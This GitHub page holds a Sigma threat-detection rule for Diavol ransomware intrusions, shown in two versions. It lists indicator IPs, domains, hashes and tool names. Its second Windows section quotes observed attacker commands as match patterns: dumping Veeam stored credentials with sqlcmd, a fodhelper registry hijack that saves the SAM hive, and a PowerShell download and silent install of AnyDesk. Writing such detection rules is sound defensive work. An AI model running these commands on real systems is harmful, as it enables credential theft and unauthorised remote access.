This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
action: global | |
title: Diavol Ransomware | |
id: e6fedcaa-265a-4ecc-92c9-5368eba2681a | |
status: experimental | |
description: See MISP event 8099 | |
author: The DFIR Report | |
level: medium | |
tags: | |
- Bazar | |
- tlp:amber | |
- workflow:state="ongoing" | |
- misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" | |
- misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" | |
- misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" | |
- misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004" | |
- misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" | |
- misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" | |
- misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" | |
- misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" | |
- misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" | |
- misp-galaxy:mitre-attack-pattern="Process Injection - T1055" | |
- misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" | |
- misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" | |
- misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" | |
- misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" | |
- misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" | |
- misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" | |
- misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" | |
- misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" | |
- misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" | |
- misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" | |
- misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" | |
--- | |
logsource: | |
category: firewall | |
detection: | |
condition: | |
- all of event8099attr499477mapping* | |
- all of event8099attr499478mapping* | |
- all of event8099attr499481mapping* | |
- all of event8099attr499483mapping* | |
- all of event8099attr501608mapping* | |
- event8099 | |
event8099: | |
dst_ip: 23.152.0.22 | |
event8099attr499477mappingIPDstPort: | |
dst_ip: 108.62.141.87 | |
dst_port: "443" | |
event8099attr499478mappingIPDstPort: | |
dst_ip: 23.81.246.32 | |
dst_port: "443" | |
event8099attr499481mappingIPDstPort: | |
dst_ip: 206.189.49.239 | |
dst_port: "443" | |
event8099attr499483mappingIPDstPort: | |
dst_ip: 159.223.31.75 | |
dst_port: "443" | |
event8099attr501608mappingIPDstPort: | |
dst_ip: 192.52.167.210 | |
dst_port: "22" | |
--- | |
logsource: | |
category: proxy | |
detection: | |
condition: | |
- all of event8099attr499477mapping* | |
- all of event8099attr499478mapping* | |
- all of event8099attr499479mapping* | |
- all of event8099attr499480mapping* | |
- all of event8099attr499481mapping* | |
- all of event8099attr499482mapping* | |
- all of event8099attr499483mapping* | |
- all of event8099attr499485mapping* | |
- all of event8099attr501608mapping* | |
- event8099 | |
event8099: | |
dst_ip: 23.152.0.22 | |
event8099attr499477mappingIPDstPort: | |
dst_ip: 108.62.141.87 | |
dst_port: "443" | |
event8099attr499478mappingIPDstPort: | |
dst_ip: 23.81.246.32 | |
dst_port: "443" | |
event8099attr499479mappingDomain: | |
- c-uri|contains: gawocag.com | |
- cs-referrer|contains: gawocag.com | |
- r-dns|contains: gawocag.com | |
event8099attr499480mappingDomain: | |
- c-uri|contains: hiduwu.com | |
- cs-referrer|contains: hiduwu.com | |
- r-dns|contains: hiduwu.com | |
event8099attr499481mappingIPDstPort: | |
dst_ip: 206.189.49.239 | |
dst_port: "443" | |
event8099attr499482mappingDomain: | |
- c-uri|contains: turkcell.info | |
- cs-referrer|contains: turkcell.info | |
- r-dns|contains: turkcell.info | |
event8099attr499483mappingIPDstPort: | |
dst_ip: 159.223.31.75 | |
dst_port: "443" | |
event8099attr499485mappingURI: | |
- c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
- cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
- r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
event8099attr501608mappingIPDstPort: | |
dst_ip: 192.52.167.210 | |
dst_port: "22" | |
--- | |
logsource: | |
category: webserver | |
detection: | |
condition: | |
- all of event8099attr499477mapping* | |
- all of event8099attr499478mapping* | |
- all of event8099attr499479mapping* | |
- all of event8099attr499480mapping* | |
- all of event8099attr499481mapping* | |
- all of event8099attr499482mapping* | |
- all of event8099attr499483mapping* | |
- all of event8099attr499485mapping* | |
- all of event8099attr501608mapping* | |
- event8099 | |
event8099: | |
dst_ip: 23.152.0.22 | |
event8099attr499477mappingIPDstPort: | |
dst_ip: 108.62.141.87 | |
dst_port: "443" | |
event8099attr499478mappingIPDstPort: | |
dst_ip: 23.81.246.32 | |
dst_port: "443" | |
event8099attr499479mappingDomain: | |
- c-uri|contains: gawocag.com | |
- cs-referrer|contains: gawocag.com | |
- r-dns|contains: gawocag.com | |
event8099attr499480mappingDomain: | |
- c-uri|contains: hiduwu.com | |
- cs-referrer|contains: hiduwu.com | |
- r-dns|contains: hiduwu.com | |
event8099attr499481mappingIPDstPort: | |
dst_ip: 206.189.49.239 | |
dst_port: "443" | |
event8099attr499482mappingDomain: | |
- c-uri|contains: turkcell.info | |
- cs-referrer|contains: turkcell.info | |
- r-dns|contains: turkcell.info | |
event8099attr499483mappingIPDstPort: | |
dst_ip: 159.223.31.75 | |
dst_port: "443" | |
event8099attr499485mappingURI: | |
- c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
- cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
- r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
event8099attr501608mappingIPDstPort: | |
dst_ip: 192.52.167.210 | |
dst_port: "22" | |
--- | |
logsource: | |
product: windows | |
detection: | |
condition: | |
- all of event8099attr499477mapping* | |
- all of event8099attr499478mapping* | |
- all of event8099attr499481mapping* | |
- all of event8099attr499483mapping* | |
- all of event8099attr501608mapping* | |
- event8099 | |
- all of event8099attr545630mapping* | |
- all of event8099attr545643mapping* | |
- all of event8099attr545644mapping* | |
- event8099object26050 | |
- event8099object26051 | |
- event8099object26052 | |
- event8099object26053 | |
- all of event8099object26054attr501549mapping* and event8099object26054 | |
- all of event8099object26055attr501555mapping* and event8099object26055 | |
- event8099object26056 | |
- all of event8099object26057attr501567mapping* and event8099object26057 | |
- all of event8099object26058attr501573mapping* and event8099object26058 | |
- all of event8099object26059attr501579mapping* and event8099object26059 | |
- all of event8099object26062attr501597mapping* and event8099object26062 | |
- event8099object26063 | |
- all of event8099object27480attr545636mapping* | |
- all of event8099object27486attr545651mapping* and all of event8099object27486attr545652mapping* | |
event8099: | |
DestinationIp: 23.152.0.22 | |
event8099attr499477mappingIPDstPort: | |
DestinationIp: 108.62.141.87 | |
DestinationPort: "443" | |
event8099attr499478mappingIPDstPort: | |
DestinationIp: 23.81.246.32 | |
DestinationPort: "443" | |
event8099attr499481mappingIPDstPort: | |
DestinationIp: 206.189.49.239 | |
DestinationPort: "443" | |
event8099attr499483mappingIPDstPort: | |
DestinationIp: 159.223.31.75 | |
DestinationPort: "443" | |
event8099attr501608mappingIPDstPort: | |
DestinationIp: 192.52.167.210 | |
DestinationPort: "22" | |
event8099attr545630mappingFilename: | |
- Image|endswith: sqlcmd.exe | |
- ParentImage|endswith: sqlcmd.exe | |
- CommandLine|contains: sqlcmd.exe | |
- ParentCommandLine|contains: sqlcmd.exe | |
- ProcessName: sqlcmd.exe | |
- ParentProcessName: sqlcmd.exe | |
event8099attr545643mappingFilename: | |
- Image|endswith: tfpkuengdlu.dll | |
- ParentImage|endswith: tfpkuengdlu.dll | |
- CommandLine|contains: tfpkuengdlu.dll | |
- ParentCommandLine|contains: tfpkuengdlu.dll | |
- ProcessName: tfpkuengdlu.dll | |
- ParentProcessName: tfpkuengdlu.dll | |
event8099attr545644mappingFilename: | |
- Image|endswith: uvvfvnnswte.dll | |
- ParentImage|endswith: uvvfvnnswte.dll | |
- CommandLine|contains: uvvfvnnswte.dll | |
- ParentCommandLine|contains: uvvfvnnswte.dll | |
- ProcessName: uvvfvnnswte.dll | |
- ParentProcessName: uvvfvnnswte.dll | |
event8099object26050: | |
Hashes|contains: | |
- ae0ecfddce57c8f966c5ce2e448a39ba | |
- 93de6401b68303f5acf7745187dbe6e8ade26a01 | |
- 2a0a114a95f373ac8ce52d2d83f3fb33da987e33db604d7e6431b98b7f006c5b | |
event8099object26051: | |
Hashes|contains: | |
- 4d8af5ba95aa23f7162b7bbf8622d801 | |
- d5b8c1a219686be5b75e58c560609023b491d9aa | |
- e87f9f378590b95de1b1ef2aaab84e1d00f210fd6aaf5025d815f33096c9d162 | |
event8099object26052: | |
Hashes|contains: | |
- fb88f4d22f14ca09ddeeca5d312f4d9f | |
- 734205a694689db504418101b91c9981e3a12deb | |
- c17e71c7ae15fdb02a4e22df4f50fb44215211755effd6e3fc56e7f3e586b299 | |
event8099object26053: | |
Hashes|contains: | |
- 9b02dd2a1a15e94922be3f85129083ac | |
- 2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a | |
- b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682 | |
event8099object26054: | |
Hashes|contains: | |
- 6798ff540f3d077c3cda2f5a4a8559f7 | |
- 40e8b04603f168b034c322be6c8b0afa5a9e89ac | |
- 0e09068581f6ed53d15d34fff9940dfc7ad224e3ce38ac8d1ca1057aee3e3feb | |
event8099object26054attr501549mappingFilename: | |
- Image|endswith: Rubeus.exe | |
- ParentImage|endswith: Rubeus.exe | |
- CommandLine|contains: Rubeus.exe | |
- ParentCommandLine|contains: Rubeus.exe | |
- ProcessName: Rubeus.exe | |
- ParentProcessName: Rubeus.exe | |
event8099object26055: | |
Hashes|contains: | |
- 69c68c62844966115c13dfee2e7bc58c | |
- 7f49ecaebe1c59c09587cee25fb8844c78a78665 | |
- 5551fb5702220dfc05e0811b7c91e149c21ec01e8ca210d1602e32dece1e464d | |
event8099object26055attr501555mappingFilename: | |
- Image|endswith: uvvfvnnswte.dll | |
- ParentImage|endswith: uvvfvnnswte.dll | |
- CommandLine|contains: uvvfvnnswte.dll | |
- ParentCommandLine|contains: uvvfvnnswte.dll | |
- ProcessName: uvvfvnnswte.dll | |
- ParentProcessName: uvvfvnnswte.dll | |
event8099object26056: | |
Hashes|contains: | |
- 56c552097559ecbafedd5683038ca480 | |
- dc0699b1d1c5a99b75334b69dafce5fe86bcf6a3 | |
- 493a1fbe833c419b37bb345f6f193517d5d9fd2577f09cc74b48b49d7d732a54 | |
event8099object26057: | |
Hashes|contains: | |
- 1e81900cc66fde050aef4c3149f1a375 | |
- f334b1b95f315f994c82da572e7acb68df4b17ed | |
- 9809bc0bea9bbfe31d47210391b124a724288b061d44dee5edc5e2582e36b271 | |
event8099object26057attr501567mappingFilename: | |
- Image|endswith: fodhelper_reg_hashes.bat | |
- ParentImage|endswith: fodhelper_reg_hashes.bat | |
- CommandLine|contains: fodhelper_reg_hashes.bat | |
- ParentCommandLine|contains: fodhelper_reg_hashes.bat | |
- ProcessName: fodhelper_reg_hashes.bat | |
- ParentProcessName: fodhelper_reg_hashes.bat | |
event8099object26058: | |
Hashes|contains: | |
- e63eff806ef5a7d04dabad6e59e88e3a | |
- 4d7102f088c73eb91213f6950f0d334157557fce | |
- 452d7485ae47f431c6c4dc2ce1f021e61cd939b4a3f51b01e15d03dcd4de8ef2 | |
event8099object26058attr501573mappingFilename: | |
- Image|endswith: README_FOR_DECRYPT.txt | |
- ParentImage|endswith: README_FOR_DECRYPT.txt | |
- CommandLine|contains: README_FOR_DECRYPT.txt | |
- ParentCommandLine|contains: README_FOR_DECRYPT.txt | |
- ProcessName: README_FOR_DECRYPT.txt | |
- ParentProcessName: README_FOR_DECRYPT.txt | |
event8099object26059: | |
Hashes|contains: | |
- e6bef068c93cacdae7f15eded63461da | |
- 0390eacb29a580adf9870dbd3412f91d984a3197 | |
- bc88ae2c3353ee858a0dcdcd087bcd55f3c7eab0c702f7b295d2836565073730 | |
event8099object26059attr501579mappingFilename: | |
- Image|endswith: MSSQLUDPScanner.exe | |
- ParentImage|endswith: MSSQLUDPScanner.exe | |
- CommandLine|contains: MSSQLUDPScanner.exe | |
- ParentCommandLine|contains: MSSQLUDPScanner.exe | |
- ProcessName: MSSQLUDPScanner.exe | |
- ParentProcessName: MSSQLUDPScanner.exe | |
event8099object26062: | |
Hashes|contains: | |
- 32d6f85c93bad9fa0f3eda1a8e800160 | |
- 6e7628cd11dc76835e8cc0b2a91dc38101fcdb90 | |
- 07f4a329f280d2896e1211ea79c73132be3a44e6c88819dea194e582bac18b3d | |
event8099object26062attr501597mappingFilename: | |
- Image|endswith: veeam1.cs.exe | |
- ParentImage|endswith: veeam1.cs.exe | |
- CommandLine|contains: veeam1.cs.exe | |
- ParentCommandLine|contains: veeam1.cs.exe | |
- ProcessName: veeam1.cs.exe | |
- ParentProcessName: veeam1.cs.exe | |
event8099object26063: | |
Hashes|contains: | |
- e5f3cea83f3aa86fc4766c8061a8f3ec | |
- 77b238f5755940fbdc85a8f88a841e73cbe240e5 | |
- a05888cf9ee72435f502a4cd41e0733fb30b37192db32fb0c33675c2b7acccde | |
event8099object27480attr545636mappingFilename: | |
- Image|endswith: fodhelper_reg_hashes.bat | |
- ParentImage|endswith: fodhelper_reg_hashes.bat | |
- CommandLine|contains: fodhelper_reg_hashes.bat | |
- ParentCommandLine|contains: fodhelper_reg_hashes.bat | |
- ProcessName: fodhelper_reg_hashes.bat | |
- ParentProcessName: fodhelper_reg_hashes.bat | |
event8099object27486attr545651mappingFilename: | |
- Image|endswith: cmd.exe | |
- ParentImage|endswith: cmd.exe | |
- CommandLine|contains: cmd.exe | |
- ParentCommandLine|contains: cmd.exe | |
- ProcessName: cmd.exe | |
- ParentProcessName: cmd.exe | |
event8099object27486attr545652mappingFilename: | |
- Image|endswith: more.exe | |
- ParentImage|endswith: more.exe | |
- CommandLine|contains: more.exe | |
- ParentCommandLine|contains: more.exe | |
- ProcessName: more.exe | |
- ParentProcessName: more.exe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
action: global | |
title: Diavol Ransomware | |
id: e6fedcaa-265a-4ecc-92c9-5368eba2681a | |
status: experimental | |
description: See MISP event 8099 | |
author: The DFIR Report | |
level: medium | |
tags: | |
- Bazar | |
- tlp:amber | |
- workflow:state="ongoing" | |
- misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" | |
- misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" | |
- misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" | |
- misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004" | |
- misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" | |
- misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" | |
- misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" | |
- misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" | |
- misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" | |
- misp-galaxy:mitre-attack-pattern="Process Injection - T1055" | |
- misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" | |
- misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" | |
- misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" | |
- misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" | |
- misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" | |
- misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" | |
- misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" | |
- misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" | |
- misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" | |
- misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" | |
- misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" | |
--- | |
logsource: | |
category: firewall | |
detection: | |
condition: | |
- all of event8099attr499477mapping* | |
- all of event8099attr499478mapping* | |
- all of event8099attr499481mapping* | |
- all of event8099attr499483mapping* | |
- all of event8099attr501608mapping* | |
- event8099 | |
event8099: | |
dst_ip: 23.152.0.22 | |
event8099attr499477mappingIPDstPort: | |
dst_ip: 108.62.141.87 | |
dst_port: "443" | |
event8099attr499478mappingIPDstPort: | |
dst_ip: 23.81.246.32 | |
dst_port: "443" | |
event8099attr499481mappingIPDstPort: | |
dst_ip: 206.189.49.239 | |
dst_port: "443" | |
event8099attr499483mappingIPDstPort: | |
dst_ip: 159.223.31.75 | |
dst_port: "443" | |
event8099attr501608mappingIPDstPort: | |
dst_ip: 192.52.167.210 | |
dst_port: "22" | |
--- | |
logsource: | |
category: proxy | |
detection: | |
condition: | |
- all of event8099attr499477mapping* | |
- all of event8099attr499478mapping* | |
- all of event8099attr499479mapping* | |
- all of event8099attr499480mapping* | |
- all of event8099attr499481mapping* | |
- all of event8099attr499482mapping* | |
- all of event8099attr499483mapping* | |
- all of event8099attr499485mapping* | |
- all of event8099attr501608mapping* | |
- event8099 | |
event8099: | |
dst_ip: 23.152.0.22 | |
event8099attr499477mappingIPDstPort: | |
dst_ip: 108.62.141.87 | |
dst_port: "443" | |
event8099attr499478mappingIPDstPort: | |
dst_ip: 23.81.246.32 | |
dst_port: "443" | |
event8099attr499479mappingDomain: | |
- c-uri|contains: gawocag.com | |
- cs-referrer|contains: gawocag.com | |
- r-dns|contains: gawocag.com | |
event8099attr499480mappingDomain: | |
- c-uri|contains: hiduwu.com | |
- cs-referrer|contains: hiduwu.com | |
- r-dns|contains: hiduwu.com | |
event8099attr499481mappingIPDstPort: | |
dst_ip: 206.189.49.239 | |
dst_port: "443" | |
event8099attr499482mappingDomain: | |
- c-uri|contains: turkcell.info | |
- cs-referrer|contains: turkcell.info | |
- r-dns|contains: turkcell.info | |
event8099attr499483mappingIPDstPort: | |
dst_ip: 159.223.31.75 | |
dst_port: "443" | |
event8099attr499485mappingURI: | |
- c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
- cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
- r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
event8099attr501608mappingIPDstPort: | |
dst_ip: 192.52.167.210 | |
dst_port: "22" | |
--- | |
logsource: | |
category: webserver | |
detection: | |
condition: | |
- all of event8099attr499477mapping* | |
- all of event8099attr499478mapping* | |
- all of event8099attr499479mapping* | |
- all of event8099attr499480mapping* | |
- all of event8099attr499481mapping* | |
- all of event8099attr499482mapping* | |
- all of event8099attr499483mapping* | |
- all of event8099attr499485mapping* | |
- all of event8099attr501608mapping* | |
- event8099 | |
event8099: | |
dst_ip: 23.152.0.22 | |
event8099attr499477mappingIPDstPort: | |
dst_ip: 108.62.141.87 | |
dst_port: "443" | |
event8099attr499478mappingIPDstPort: | |
dst_ip: 23.81.246.32 | |
dst_port: "443" | |
event8099attr499479mappingDomain: | |
- c-uri|contains: gawocag.com | |
- cs-referrer|contains: gawocag.com | |
- r-dns|contains: gawocag.com | |
event8099attr499480mappingDomain: | |
- c-uri|contains: hiduwu.com | |
- cs-referrer|contains: hiduwu.com | |
- r-dns|contains: hiduwu.com | |
event8099attr499481mappingIPDstPort: | |
dst_ip: 206.189.49.239 | |
dst_port: "443" | |
event8099attr499482mappingDomain: | |
- c-uri|contains: turkcell.info | |
- cs-referrer|contains: turkcell.info | |
- r-dns|contains: turkcell.info | |
event8099attr499483mappingIPDstPort: | |
dst_ip: 159.223.31.75 | |
dst_port: "443" | |
event8099attr499485mappingURI: | |
- c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
- cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
- r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM | |
event8099attr501608mappingIPDstPort: | |
dst_ip: 192.52.167.210 | |
dst_port: "22" | |
--- | |
logsource: | |
product: windows | |
detection: | |
condition: | |
- all of event8099attr499477mapping* | |
- all of event8099attr499478mapping* | |
- all of event8099attr499481mapping* | |
- all of event8099attr499483mapping* | |
- all of event8099attr501608mapping* | |
- event8099 | |
- all of event8099attr545630mapping* | |
- all of event8099attr545643mapping* | |
- all of event8099attr545644mapping* | |
- event8099object26050 | |
- event8099object26051 | |
- event8099object26052 | |
- event8099object26053 | |
- all of event8099object26054attr501549mapping* and event8099object26054 | |
- all of event8099object26055attr501555mapping* and event8099object26055 | |
- event8099object26056 | |
- all of event8099object26057attr501567mapping* and event8099object26057 | |
- all of event8099object26058attr501573mapping* and event8099object26058 | |
- all of event8099object26059attr501579mapping* and event8099object26059 | |
- all of event8099object26062attr501597mapping* and event8099object26062 | |
- event8099object26063 | |
- event8099object27478 | |
- event8099object27479 | |
- all of event8099object27480attr545636mapping* | |
- event8099object27481 | |
- event8099object27482 | |
- event8099object27483 | |
- event8099object27484 | |
- event8099object27485 | |
- event8099object27486 | |
event8099: | |
DestinationIp: 23.152.0.22 | |
event8099attr499477mappingIPDstPort: | |
DestinationIp: 108.62.141.87 | |
DestinationPort: "443" | |
event8099attr499478mappingIPDstPort: | |
DestinationIp: 23.81.246.32 | |
DestinationPort: "443" | |
event8099attr499481mappingIPDstPort: | |
DestinationIp: 206.189.49.239 | |
DestinationPort: "443" | |
event8099attr499483mappingIPDstPort: | |
DestinationIp: 159.223.31.75 | |
DestinationPort: "443" | |
event8099attr501608mappingIPDstPort: | |
DestinationIp: 192.52.167.210 | |
DestinationPort: "22" | |
event8099attr545630mappingFilename: | |
- Image|endswith: sqlcmd.exe | |
- ParentImage|endswith: sqlcmd.exe | |
- CommandLine|contains: sqlcmd.exe | |
- ParentCommandLine|contains: sqlcmd.exe | |
- ProcessName: sqlcmd.exe | |
- ParentProcessName: sqlcmd.exe | |
event8099attr545643mappingFilename: | |
- Image|endswith: tfpkuengdlu.dll | |
- ParentImage|endswith: tfpkuengdlu.dll | |
- CommandLine|contains: tfpkuengdlu.dll | |
- ParentCommandLine|contains: tfpkuengdlu.dll | |
- ProcessName: tfpkuengdlu.dll | |
- ParentProcessName: tfpkuengdlu.dll | |
event8099attr545644mappingFilename: | |
- Image|endswith: uvvfvnnswte.dll | |
- ParentImage|endswith: uvvfvnnswte.dll | |
- CommandLine|contains: uvvfvnnswte.dll | |
- ParentCommandLine|contains: uvvfvnnswte.dll | |
- ProcessName: uvvfvnnswte.dll | |
- ParentProcessName: uvvfvnnswte.dll | |
event8099object26050: | |
Hashes|contains: | |
- ae0ecfddce57c8f966c5ce2e448a39ba | |
- 93de6401b68303f5acf7745187dbe6e8ade26a01 | |
- 2a0a114a95f373ac8ce52d2d83f3fb33da987e33db604d7e6431b98b7f006c5b | |
event8099object26051: | |
Hashes|contains: | |
- 4d8af5ba95aa23f7162b7bbf8622d801 | |
- d5b8c1a219686be5b75e58c560609023b491d9aa | |
- e87f9f378590b95de1b1ef2aaab84e1d00f210fd6aaf5025d815f33096c9d162 | |
event8099object26052: | |
Hashes|contains: | |
- fb88f4d22f14ca09ddeeca5d312f4d9f | |
- 734205a694689db504418101b91c9981e3a12deb | |
- c17e71c7ae15fdb02a4e22df4f50fb44215211755effd6e3fc56e7f3e586b299 | |
event8099object26053: | |
Hashes|contains: | |
- 9b02dd2a1a15e94922be3f85129083ac | |
- 2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a | |
- b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682 | |
event8099object26054: | |
Hashes|contains: | |
- 6798ff540f3d077c3cda2f5a4a8559f7 | |
- 40e8b04603f168b034c322be6c8b0afa5a9e89ac | |
- 0e09068581f6ed53d15d34fff9940dfc7ad224e3ce38ac8d1ca1057aee3e3feb | |
event8099object26054attr501549mappingFilename: | |
- Image|endswith: Rubeus.exe | |
- ProcessName|contains: Rubeus.exe | |
event8099object26055: | |
Hashes|contains: | |
- 69c68c62844966115c13dfee2e7bc58c | |
- 7f49ecaebe1c59c09587cee25fb8844c78a78665 | |
- 5551fb5702220dfc05e0811b7c91e149c21ec01e8ca210d1602e32dece1e464d | |
event8099object26055attr501555mappingFilename: | |
- Image|endswith: uvvfvnnswte.dll | |
- ProcessName|contains: uvvfvnnswte.dll | |
event8099object26056: | |
Hashes|contains: | |
- 56c552097559ecbafedd5683038ca480 | |
- dc0699b1d1c5a99b75334b69dafce5fe86bcf6a3 | |
- 493a1fbe833c419b37bb345f6f193517d5d9fd2577f09cc74b48b49d7d732a54 | |
event8099object26057: | |
Hashes|contains: | |
- 1e81900cc66fde050aef4c3149f1a375 | |
- f334b1b95f315f994c82da572e7acb68df4b17ed | |
- 9809bc0bea9bbfe31d47210391b124a724288b061d44dee5edc5e2582e36b271 | |
event8099object26057attr501567mappingFilename: | |
- Image|endswith: fodhelper_reg_hashes.bat | |
- ProcessName|contains: fodhelper_reg_hashes.bat | |
event8099object26058: | |
Hashes|contains: | |
- e63eff806ef5a7d04dabad6e59e88e3a | |
- 4d7102f088c73eb91213f6950f0d334157557fce | |
- 452d7485ae47f431c6c4dc2ce1f021e61cd939b4a3f51b01e15d03dcd4de8ef2 | |
event8099object26058attr501573mappingFilename: | |
- Image|endswith: README_FOR_DECRYPT.txt | |
- ProcessName|contains: README_FOR_DECRYPT.txt | |
event8099object26059: | |
Hashes|contains: | |
- e6bef068c93cacdae7f15eded63461da | |
- 0390eacb29a580adf9870dbd3412f91d984a3197 | |
- bc88ae2c3353ee858a0dcdcd087bcd55f3c7eab0c702f7b295d2836565073730 | |
event8099object26059attr501579mappingFilename: | |
- Image|endswith: MSSQLUDPScanner.exe | |
- ProcessName|contains: MSSQLUDPScanner.exe | |
event8099object26062: | |
Hashes|contains: | |
- 32d6f85c93bad9fa0f3eda1a8e800160 | |
- 6e7628cd11dc76835e8cc0b2a91dc38101fcdb90 | |
- 07f4a329f280d2896e1211ea79c73132be3a44e6c88819dea194e582bac18b3d | |
event8099object26062attr501597mappingFilename: | |
- Image|endswith: veeam1.cs.exe | |
- ProcessName|contains: veeam1.cs.exe | |
event8099object26063: | |
Hashes|contains: | |
- e5f3cea83f3aa86fc4766c8061a8f3ec | |
- 77b238f5755940fbdc85a8f88a841e73cbe240e5 | |
- a05888cf9ee72435f502a4cd41e0733fb30b37192db32fb0c33675c2b7acccde | |
event8099object27478: | |
CommandLine|contains: sqlcmd.exe -S localhost,51341 -E -y0 -Q "SELECT TOP (1000) | |
[id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM | |
[VeeamBackup].[dbo].[Credentials];" | |
event8099object27479: | |
CommandLine|contains: csc.exe veeam1.cs.txt | |
event8099object27480attr545636mappingFilename: | |
- Image|endswith: fodhelper_reg_hashes.bat | |
- ProcessName|contains: fodhelper_reg_hashes.bat | |
event8099object27481: | |
CommandLine|contains: reg.exe add hkcu\software\classes\ms-settings\shell\open\command | |
/ve /d "reg.exe save hklm\sam %ALLUSERSPROFILE%\sam.save" /f | |
event8099object27482: | |
CommandLine|contains: (new-object System.Net.WebClient).DownloadFile("http://download.anydesk.com/AnyDesk.exe", | |
"%ALLUSERSPROFILE%\AnyDesk.exe") | |
event8099object27483: | |
CommandLine|contains: cmd.exe /c %ALLUSERSPROFILE%\AnyDesk.exe --install %ALLUSERSPROFILE%\AnyDesk | |
--start-with-win --silent | |
event8099object27484: | |
ParentProcessName: msedge.exe | |
ProcessName: rundll32.exe | |
event8099object27485: | |
CommandLine|contains: sqlcmd -E -S localhost -Q "BACKUP DATABASE master TO DISK='%ALLUSERSPROFILE%\sql\master.bak'" | |
event8099object27486: | |
CommandLine|contains: edge-cookies.json | |
Image|endswith: more.exe | |
ParentImage|endswith: cmd.exe |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment